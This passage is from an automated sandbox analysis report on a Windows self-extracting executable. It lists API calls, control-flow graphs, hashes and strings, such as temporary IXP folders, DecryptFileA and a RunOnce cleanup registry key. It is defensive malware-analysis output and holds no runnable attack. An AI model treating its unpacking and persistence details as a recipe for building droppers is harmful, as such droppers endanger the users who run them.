                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                      • API String ID: 4237285672-305352358
                                                                                                                      • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                      • Instruction ID: bfdf6487f714e3c856ec3766d9d130cae43b3720da24cbf19f980ff8a4f6b838
                                                                                                                      • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                      • Instruction Fuzzy Hash: C5A17E36A19682C6E720AF20F4486EAFBA5FB89B54F845135FA4D43B54DFBCD409CB10

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                      • String ID: *MEMCAB$CABINET
                                                                                                                      • API String ID: 1305606123-2642027498
                                                                                                                      • Opcode ID: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                                                                      • Instruction ID: da0beddae8112880e5c544170b55986182bb2afc457544e49a088d2a51362353
                                                                                                                      • Opcode Fuzzy Hash: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                                                                      • Instruction Fuzzy Hash: FF51F431A0AB42C6EB50AB10F8582F9FBA1FB89F55FC49135E94E46664DFBCE005C760

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 525 7ff761f730ec-7ff761f73114 526 7ff761f73116-7ff761f7311c 525->526 527 7ff761f73141-7ff761f73148 call 7ff761f75fe4 525->527 528 7ff761f7311e call 7ff761f760a4 526->528 529 7ff761f73134-7ff761f7313b call 7ff761f73f74 526->529 534 7ff761f7314e-7ff761f73155 call 7ff761f766c4 527->534 535 7ff761f73236 527->535 536 7ff761f73123-7ff761f73125 528->536 529->527 529->535 534->535 543 7ff761f7315b-7ff761f7319d GetSystemDirectoryA call 7ff761f77ba8 LoadLibraryA 534->543 539 7ff761f73238-7ff761f73258 call 7ff761f78470 535->539 536->535 540 7ff761f7312b-7ff761f73132 536->540 540->527 540->529 547 7ff761f731c9-7ff761f731de FreeLibrary 543->547 548 7ff761f7319f-7ff761f731b8 GetProcAddress 543->548 550 7ff761f73273-7ff761f73288 SetCurrentDirectoryA 547->550 551 7ff761f731e4-7ff761f731ea 547->551 548->547 549 7ff761f731ba-7ff761f731c3 DecryptFileA 548->549 549->547 552 7ff761f7328a-7ff761f7328f 550->552 553 7ff761f73291-7ff761f73297 550->553 551->550 554 7ff761f731f0-7ff761f7320b GetWindowsDirectoryA 551->554 555 7ff761f73212-7ff761f73230 call 7ff761f74dcc call 7ff761f77700 552->555 556 7ff761f7332d-7ff761f73335 553->556 557 7ff761f7329d-7ff761f732a4 553->557 558 7ff761f7320d 554->558 559 7ff761f7325a-7ff761f7326a call 7ff761f76ca4 554->559 555->535 561 7ff761f73349 556->561 562 7ff761f73337-7ff761f73339 556->562 563 7ff761f732a9-7ff761f732b7 557->563 558->555 566 7ff761f7326f-7ff761f73271 559->566 565 7ff761f7334b-7ff761f73359 561->565 562->561 567 7ff761f7333b-7ff761f73342 call 7ff761f72318 562->567 563->563 568 7ff761f732b9-7ff761f732c0 563->568 571 7ff761f7335b-7ff761f73361 565->571 572 7ff761f73376-7ff761f7337d 565->572 566->535 566->550 576 7ff761f73347 567->576 574 7ff761f732fb call 7ff761f75d90 568->574 575 7ff761f732c2-7ff761f732c9 568->575 571->572 579 7ff761f73363 call 7ff761f740c4 571->579 581 7ff761f73388-7ff761f7338d 572->581 582 7ff761f7337f-7ff761f73381 572->582 585 7ff761f73300 574->585 575->574 577 7ff761f732cb-7ff761f732f1 call 7ff761f77ac8 575->577 576->565 587 7ff761f732f6-7ff761f732f9 577->587 588 7ff761f73368-7ff761f7336a 579->588 581->539 582->581 586 7ff761f73383 call 7ff761f7494c 582->586 589 7ff761f73302 585->589 586->581 587->589 588->535 591 7ff761f73370 588->591 592 7ff761f73313-7ff761f73321 call 7ff761f7772c 589->592 593 7ff761f73304-7ff761f7330e 589->593 591->572 592->535 596 7ff761f73327 592->596 593->535 596->556
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                      • API String ID: 3010855178-1173327654
                                                                                                                      • Opcode ID: cffcf8a3b76aee679a097a9499c7360123ef4f246d294c3f42600086d58a5e88
                                                                                                                      • Instruction ID: f28fa694be2d6227aa8817ebcbd40db02c3eb72d59cd89d097e35b51ec9cb186
                                                                                                                      • Opcode Fuzzy Hash: cffcf8a3b76aee679a097a9499c7360123ef4f246d294c3f42600086d58a5e88
                                                                                                                      • Instruction Fuzzy Hash: 0571E120A0E643D6FB61FB20B8582F5A7A5AF94F90FD54039F94D822A5DEECE445C720

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 597 7ff761f764e4-7ff761f76510 598 7ff761f76516-7ff761f7651b call 7ff761f763b8 597->598 599 7ff761f765df-7ff761f765ee 597->599 602 7ff761f76520-7ff761f76522 598->602 601 7ff761f765f1-7ff761f765fb 599->601 603 7ff761f765fd-7ff761f76603 601->603 604 7ff761f76610-7ff761f7661b 601->604 605 7ff761f76688-7ff761f7668a 602->605 606 7ff761f76528-7ff761f7653e 602->606 603->604 607 7ff761f76605-7ff761f7660e 603->607 608 7ff761f7661e-7ff761f76628 call 7ff761f76b70 604->608 610 7ff761f76698-7ff761f766bc call 7ff761f78470 605->610 609 7ff761f76541-7ff761f7654b 606->609 607->601 607->604 620 7ff761f76649-7ff761f7664b 608->620 621 7ff761f7662a-7ff761f7663d CreateDirectoryA 608->621 612 7ff761f7654d-7ff761f76553 609->612 613 7ff761f76560-7ff761f76575 609->613 612->613 616 7ff761f76555-7ff761f7655e 612->616 617 7ff761f765cc-7ff761f765dd call 7ff761f77ba8 613->617 618 7ff761f76577-7ff761f7658f GetSystemInfo 613->618 616->609 616->613 617->608 625 7ff761f765bb 618->625 626 7ff761f76591-7ff761f76594 618->626 622 7ff761f7664d-7ff761f76655 call 7ff761f76ca4 620->622 623 7ff761f7668c-7ff761f76693 620->623 627 7ff761f7667d-7ff761f76682 call 7ff761f77700 621->627 628 7ff761f7663f 621->628 636 7ff761f7665a-7ff761f7665c 622->636 623->610 629 7ff761f765c2-7ff761f765c7 call 7ff761f77ba8 625->629 633 7ff761f76596-7ff761f76599 626->633 634 7ff761f765b2-7ff761f765b9 626->634 627->605 628->620 629->617 638 7ff761f7659b-7ff761f7659e 633->638 639 7ff761f765a9-7ff761f765b0 633->639 634->629 636->623 640 7ff761f7665e-7ff761f76664 636->640 638->617 641 7ff761f765a0-7ff761f765a7 638->641 639->629 640->605 642 7ff761f76666-7ff761f7667b RemoveDirectoryA 640->642 641->629 642->605
                                                                                                                      APIs
                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF761F72CE1), ref: 00007FF761F7657C
                                                                                                                      • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF761F72CE1), ref: 00007FF761F7662F
                                                                                                                      • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF761F72CE1), ref: 00007FF761F7666F
                                                                                                                        • Part of subcall function 00007FF761F763B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF761F72CE1), ref: 00007FF761F76423
                                                                                                                        • Part of subcall function 00007FF761F763B8: GetFileAttributesA.KERNELBASE ref: 00007FF761F76432
                                                                                                                        • Part of subcall function 00007FF761F763B8: GetTempFileNameA.KERNEL32 ref: 00007FF761F7645B
                                                                                                                        • Part of subcall function 00007FF761F763B8: DeleteFileA.KERNEL32 ref: 00007FF761F76473
                                                                                                                        • Part of subcall function 00007FF761F763B8: CreateDirectoryA.KERNEL32 ref: 00007FF761F76484
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                      • API String ID: 1979080616-3374052426
                                                                                                                      • Opcode ID: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
                                                                                                                      • Instruction ID: 06920db111b958f5187ecf0a514d1b795b3ec23d6979a96e72af41dcfe982091
                                                                                                                      • Opcode Fuzzy Hash: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
                                                                                                                      • Instruction Fuzzy Hash: 7A517D61A0A683C1FB55AB25B8182F9E7A0AF85F60FD84135F94E46295DFBCE805C720

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3183975587-3916222277
                                                                                                                      • Opcode ID: 0612355d7098dd9214d3ec5057fb5c6aaccd7f37b0a93b2f13a3672e5b451275
                                                                                                                      • Instruction ID: 9f71fc2020343ae810f0ccc511d12b6c64d5f7ce5e07e1d3662ccbb34043b13c
                                                                                                                      • Opcode Fuzzy Hash: 0612355d7098dd9214d3ec5057fb5c6aaccd7f37b0a93b2f13a3672e5b451275
                                                                                                                      • Instruction Fuzzy Hash: 3E512C3291AA85C6E760AB50F4583FAF7A0FB88B65F844135FA4D466A4CFBCD444CB20

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                                                      • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                                                      • API String ID: 1302179841-1204263913
                                                                                                                      • Opcode ID: daf853eb771a12f59abebe1272519bf3fa6e24b0f3f778556f2b7b241e27ec3d
                                                                                                                      • Instruction ID: c2e69b999fd8ff6eeea8f1cdd89ff8b0b29246d1a33ec12e1d5911018119ed20
                                                                                                                      • Opcode Fuzzy Hash: daf853eb771a12f59abebe1272519bf3fa6e24b0f3f778556f2b7b241e27ec3d
                                                                                                                      • Instruction Fuzzy Hash: 3A310C21A0AA42C6FB64BB60B4582F9E7A0BF59F60FC44135FA4D02695DFBDE4408720
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 836429354-0
                                                                                                                      • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                                      • Instruction ID: 0397b09d8e8ada5c45ce87893ae529529ba72e286640834c0a68ef3bc23588b6
                                                                                                                      • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                                                                      • Instruction Fuzzy Hash: 92515C3160AA86D5EB11AF20F8582F8B7A1FB45F94FC48171EA4E07695DFBDD509C320

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                                                      • String ID: $Adv
                                                                                                                      • API String ID: 2654313074-3776740653
                                                                                                                      • Opcode ID: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                                                      • Instruction ID: 197bb355ea3eb86f1193aee72240e622c01a096de39620f566a29ae37c5fcac6
                                                                                                                      • Opcode Fuzzy Hash: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                                                                      • Instruction Fuzzy Hash: D3514F31A0A643C6F750AB15F95C2F9EBA1FB89F65F849231E91E02794CFBC90458720

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                      • API String ID: 3049360512-3137473940
                                                                                                                      • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                                                                      • Instruction ID: ba2a332d344722bf1dc0e66789275219335d91b8efb1808f1bb27507e31696f4
                                                                                                                      • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                                                                      • Instruction Fuzzy Hash: 51513E21A0AA82C6FB51AB10F8583F9F7A0FB49F55FC44135FA4D42694CFACE848C720

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                      • API String ID: 2209512893-559176071
                                                                                                                      • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                                      • Instruction ID: 2aeda20bd33ee0c15a3ec6eb0e069413656d9ad41f4cf989bcb1e9aaee6304ca
                                                                                                                      • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                                                                      • Instruction Fuzzy Hash: CF315E32609B41CAD7109F24F8445E9F7A4FB89B54F844539F68D43B58DFB8D060CB10

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                      • String ID: IXP$IXP%03d.TMP
                                                                                                                      • API String ID: 1082909758-3932986939
                                                                                                                      • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                                      • Instruction ID: 94ad4c2dd57186264b655bb20464ae32583bbbdb00b7029869da0a2c6cc00759
                                                                                                                      • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                                                                      • Instruction Fuzzy Hash: 1B212F31609981C6F710AB16B9583F9E761FB8EFA1F858130ED4E46795CEBC9445C710
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2995914023-0
                                                                                                                      • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                                                      • Instruction ID: 496cb5940f6459b1f6193cb253a02f1014f7db37ae4ac63777e55b22e94d3369
                                                                                                                      • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                                                                      • Instruction Fuzzy Hash: B7512B31A0AA42C6E760AB65F8583F5A3E0BB44F55FD80035F94D822A5DFBCE841E720
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75078
                                                                                                                        • Part of subcall function 00007FF761F75050: SizeofResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F75089
                                                                                                                        • Part of subcall function 00007FF761F75050: FindResourceA.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750AF
                                                                                                                        • Part of subcall function 00007FF761F75050: LoadResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750C0
                                                                                                                        • Part of subcall function 00007FF761F75050: LockResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750CF
                                                                                                                        • Part of subcall function 00007FF761F75050: memcpy_s.MSVCRT ref: 00007FF761F750EE
                                                                                                                        • Part of subcall function 00007FF761F75050: FreeResource.KERNEL32(?,?,00000000,00007FF761F72E43), ref: 00007FF761F750FD
                                                                                                                      • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF761F73123), ref: 00007FF761F760C9
                                                                                                                      • LocalFree.KERNEL32 ref: 00007FF761F76142
                                                                                                                        • Part of subcall function 00007FF761F74DCC: LoadStringA.USER32 ref: 00007FF761F74E60
                                                                                                                        • Part of subcall function 00007FF761F74DCC: MessageBoxA.USER32 ref: 00007FF761F74EA0
                                                                                                                        • Part of subcall function 00007FF761F77700: GetLastError.KERNEL32 ref: 00007FF761F77704
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                      • String ID: $<None>$UPROMPT
                                                                                                                      • API String ID: 957408736-2569542085
                                                                                                                      • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                                      • Instruction ID: 2acdb228242c6ec613e998000d16e58c76e5ba99dc0216b1e56d99cc2da6227a
                                                                                                                      • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                                      • Instruction Fuzzy Hash: CE313E71A0A642C7F720AB20B5587FAF761FB89F54F805135EA0E46691DFFD90048B10
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile$lstrcmp
                                                                                                                      • String ID: *MEMCAB
                                                                                                                      • API String ID: 1301100335-3211172518
                                                                                                                      • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                                                      • Instruction ID: 02c6572cff175cdd43e3756d3317ee66b2626c97c2a1995bbc9f904b506f35d7
                                                                                                                      • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
